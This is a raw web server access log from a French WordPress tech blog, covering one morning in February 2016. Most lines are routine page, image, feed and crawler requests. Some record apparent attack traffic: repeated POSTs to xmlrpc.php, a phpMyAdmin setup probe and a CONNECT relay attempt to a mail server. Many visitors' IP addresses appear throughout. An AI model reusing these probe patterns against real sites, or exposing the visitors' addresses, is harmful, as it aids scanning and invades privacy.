/wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:22:49 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3421 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:22:49 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:22:49 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:22:49 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n82.226.78.218 - - [09/Feb/2016:07:22:52 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 503 \"http://techmeup.co/guillaume-charmes-meilleur-developpeur-du-monde/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\"\n157.55.39.161 - - [09/Feb/2016:07:26:32 -0800] \"GET /tagged/rockstar HTTP/1.1\" 301 522 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n54.193.210.75 - - [09/Feb/2016:07:29:21 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"Digg Feed Fetcher 1.0 (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n130.0.236.153 - - [09/Feb/2016:07:31:52 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n199.16.156.125 - - [09/Feb/2016:07:35:22 -0800] \"GET /robots.txt HTTP/1.1\" 200 367 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:07:35:22 -0800] \"GET /post/103488947853/textme-cest-de-la-bombe HTTP/1.1\" 301 287 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:07:35:23 -0800] \"GET /post/99978147058/du-side-project-a-google-le-fabuleux-parcours-dhoa-v HTTP/1.1\" 301 316 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:07:35:23 -0800] \"GET /post/96006277128/xavier-mouton-dubosc-le-developpeur-aux-mille-vies HTTP/1.1\" 301 314 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:07:35:25 -0800] \"GET /post/98806539878/le-jour-ou-les-startups-tech-nauront-plus-de-sens HTTP/1.1\" 301 313 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:07:35:26 -0800] \"GET /alexei-chemenda-toujours-etudiant-et-deja-entrepreneur HTTP/1.1\" 404 4816 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [09/Feb/2016:07:35:26 -0800] \"GET /post/88351742277/michael-ferranti-responsable-marketing-a-mailgun-nous HTTP/1.1\" 301 317 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [09/Feb/2016:07:35:26 -0800] \"GET /paul-duan-le-super-heros-de-la-data-science-pour HTTP/1.1\" 301 389 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:07:35:27 -0800] \"GET /a-quoi-ca-sert-un-co-fondateur-non-technique HTTP/1.1\" 301 385 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:07:35:27 -0800] \"GET /xavier-mouton-dubosc-le-developpeur-aux-mille-vies HTTP/1.1\" 404 4816 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:07:35:29 -0800] \"GET /mathieu-ghaleb-la-superstar-de-lombre HTTP/1.1\" 301 378 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:07:35:29 -0800] \"GET /les-demi-verites-de-monsieur-xavier-niel/?utm_term=0_f60dad0472-746ae4d6a9-66832769&utm_content=bufferf9d3f&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer HTTP/1.1\" 200 12943 \"-\" \"Twitterbot/1.0\"\n199.16.156.125 - - [09/Feb/2016:07:35:32 -0800] \"GET /mathieu-ghaleb-la-superstar-de-lombre/ HTTP/1.1\" 200 12227 \"-\" \"Twitterbot/1.0\"\n178.137.17.196 - - [09/Feb/2016:07:36:43 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29488 \"http://xn-----6kcaacnblni5c5bicdpcmficy.xn--p1ai/\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)\"\n93.174.93.241 - - [09/Feb/2016:07:36:53 -0800] \"GET //phpmyadmin/scripts/setup.php HTTP/1.1\" 403 478 \"-\" \"-\"\n130.0.236.153 - - [09/Feb/2016:07:37:43 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n46.118.116.135 - - [09/Feb/2016:07:38:43 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29392 \"http://ufa.xrus.org/\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)\"\n130.0.236.153 - - [09/Feb/2016:07:43:25 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:07:46:31 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n80.13.10.184 - - [09/Feb/2016:07:48:55 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n80.13.10.184 - - [09/Feb/2016:07:49:06 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n130.0.236.153 - - [09/Feb/2016:07:49:42 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n198.58.102.117 - - [09/Feb/2016:07:53:21 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n199.16.156.126 - - [09/Feb/2016:07:57:14 -0800] \"GET /post/104056058258/les-geeks-les-vengeurs-masques-du-21eme-siecle HTTP/1.1\" 301 310 \"-\" \"Twitterbot/1.0\"\n207.241.229.198 - - [09/Feb/2016:08:01:27 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.0\" 200 8997 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)\"\n2.1.201.36 - - [09/Feb/2016:08:06:21 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n180.76.15.149 - - [09/Feb/2016:08:08:12 -0800] \"GET /category/europe/ HTTP/1.1\" 200 7332 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n207.241.229.215 - - [09/Feb/2016:08:11:42 -0800] \"GET /wp-content/uploads/2015/03/Mathilde-le-Rouzic-Quaelead-300x225.jpg HTTP/1.0\" 200 16220 \"http://marryme-bridal.ru/\" \"Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)\"\n198.58.103.160 - - [09/Feb/2016:08:18:16 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n130.0.236.153 - - [09/Feb/2016:08:25:09 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n86.246.217.7 - - [09/Feb/2016:08:32:16 -0800] \"GET /feed/ HTTP/1.1\" 304 219 \"-\" \"Mozilla/5.0 Vienna/3.0.9\"\n68.180.228.42 - - [09/Feb/2016:08:35:44 -0800] \"GET /le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/ HTTP/1.1\" 200 9636 \"-\" \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\"\n81.242.141.238 - - [09/Feb/2016:08:37:33 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n81.242.141.238 - - [09/Feb/2016:08:37:34 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n81.242.141.238 - - [09/Feb/2016:08:37:34 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n81.242.141.238 - - [09/Feb/2016:08:37:34 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n81.242.141.238 - - [09/Feb/2016:08:37:35 -0800] \"GET /wp-content/uploads/2014/09/logo-transparent-horizontal-1024x482.png HTTP/1.1\" 200 334990 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n81.242.141.238 - - [09/Feb/2016:08:37:38 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n81.242.141.238 - - [09/Feb/2016:08:37:40 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n199.16.156.126 - - [09/Feb/2016:08:37:45 -0800] \"GET /wp-content/uploads/2014/09/tumblr_inline_ncaeibjep11spe2e1-300x225.jpg HTTP/1.1\" 200 21425 \"-\" \"Twitterbot/1.0\"\n199.16.156.124 - - [09/Feb/2016:08:40:09 -0800] \"GET /les-geeks-les-vengeurs-masques-du-21eme-siecle HTTP/1.1\" 404 4816 \"-\" \"Twitterbot/1.0\"\n81.252.96.8 - - [09/Feb/2016:08:44:53 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 36583 \"-\" \"Mozilla/4.0 (compatible;)\"\n51.254.131.246 - - [09/Feb/2016:08:48:52 -0800] \"GET /robots.txt HTTP/1.0\" 200 346 \"-\" \"Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)\"\n130.0.236.153 - - [09/Feb/2016:08:51:45 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n130.0.236.153 - - [09/Feb/2016:08:57:29 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n109.15.143.216 - - [09/Feb/2016:09:00:44 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n109.15.143.216 - - [09/Feb/2016:09:00:56 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n81.252.96.8 - - [09/Feb/2016:09:02:13 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 304 188 \"-\" \"Mozilla/4.0 (compatible;)\"\n217.195.28.157 - - [09/Feb/2016:09:04:34 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/author/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n217.195.28.157 - - [09/Feb/2016:09:04:34 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/author/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n2.1.201.36 - - [09/Feb/2016:09:06:21 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n199.119.124.43 - - [09/Feb/2016:09:07:35 -0800] \"GET /rss HTTP/1.1\" 301 418 \"-\" \"Mozilla/5.0 (compatible; theoldreader.com; 1 subscribers; feed-id=e020a4234ced4329fa4063c1)\"\n130.0.236.153 - - [09/Feb/2016:09:09:42 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n92.222.20.166 - - [09/Feb/2016:09:12:46 -0800] \"GET /rss HTTP/1.1\" 304 163 \"-\" \"Tiny Tiny RSS/16.1 (c352248) (http://tt-rss.org/)\"\n130.0.236.153 - - [09/Feb/2016:09:15:42 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n176.147.244.57 - - [09/Feb/2016:09:17:05 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n176.147.244.57 - - [09/Feb/2016:09:17:17 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n111.248.98.33 - - [09/Feb/2016:09:19:04 -0800] \"CONNECT vip163mx00.mxmail.netease.com:25 HTTP/1.0\" 404 15416 \"-\" \"-\"\n89.121.185.36 - - [09/Feb/2016:09:20:36 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.121.185.36 - - [09/Feb/2016:09:20:36 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.121.185.36 - - [09/Feb/2016:09:20:36 -0800] \"GET /wp-content/uploads/2015/03/Mathilde-le-Rouzic-Quaelead-300x225.jpg HTTP/1.1\" 200 16230 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.121.185.36 - - [09/Feb/2016:09:20:37 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x225.jpg HTTP/1.1\" 200 32895 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.121.185.36 - - [09/Feb/2016:09:20:37 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n89.121.185.36 - - [09/Feb/2016:09:20:37 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n198.58.102.155 - - [09/Feb/2016:09:23:22 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n157.55.39.231 - - [09/Feb/2016:09:28:39 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n50.62.176.163 - - [09/Feb/2016:09:31:57 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n130.0.236.153 - - [09/Feb/2016:09:36:22 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n185.82.148.10 - - [09/Feb/2016:09:40:39 -0800] \"GET /feed/ HTTP/1.1\" 200 63896 \"-\" \"Scoop\"\n195.154.209.237 - - [09/Feb/2016:09:40:40 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.209.237 - - [09/Feb/2016:09:40:40 -0800] \"GET /wp-content/uploads/2014/11/tumblr_inline_negm7m1xwx1sygmpd-50x50.jpg HTTP/1.1\" 200 1740 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.209.237 - - [09/Feb/2016:09:40:40 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4391 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.209.237 - - [09/Feb/2016:09:40:40 -0800] \"GET /wp-content/uploads/2015/06/sylvia.png HTTP/1.1\" 200 803659 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:43 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:43 -0800] \"GET /wp-content/uploads/2014/11/tumblr_inline_negm7m1xwx1sygmpd-50x50.jpg HTTP/1.1\" 200 1740 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:43 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:44 -0800] \"GET /le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/ HTTP/1.1\" 200 9679 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:44 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:44 -0800] \"GET /wp-content/uploads/2014/05/tumblr_inline_n5cg5zlThJ1sa6hof-50x50.jpg HTTP/1.1\" 200 2073 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:44 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:45 -0800] \"GET /ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/ HTTP/1.1\" 200 9085 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:45 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:45 -0800] \"GET /wp-content/uploads/2015/03/Mathilde-le-Rouzic-Quaelead-200x300.jpg HTTP/1.1\" 200 16095 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:45 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:46 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:46 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:46 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.53 - - [09/Feb/2016:09:40:46 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.209.237 - - [09/Feb/2016:09:40:47 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.209.237 - - [09/Feb/2016:09:40:47 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.209.237 - - [09/Feb/2016:09:40:47 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190495 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.209.237 - - [09/Feb/2016:09:40:47 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:50 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:50 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.59 - - [09/Feb/2016:09:40:50 -0800] \"GET /wp-content/uploads/2014/04/tumblr_inline_n4pj44K9XI1sa6hof-50x50.jpg HTTP/1.1\" 200 2400 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" 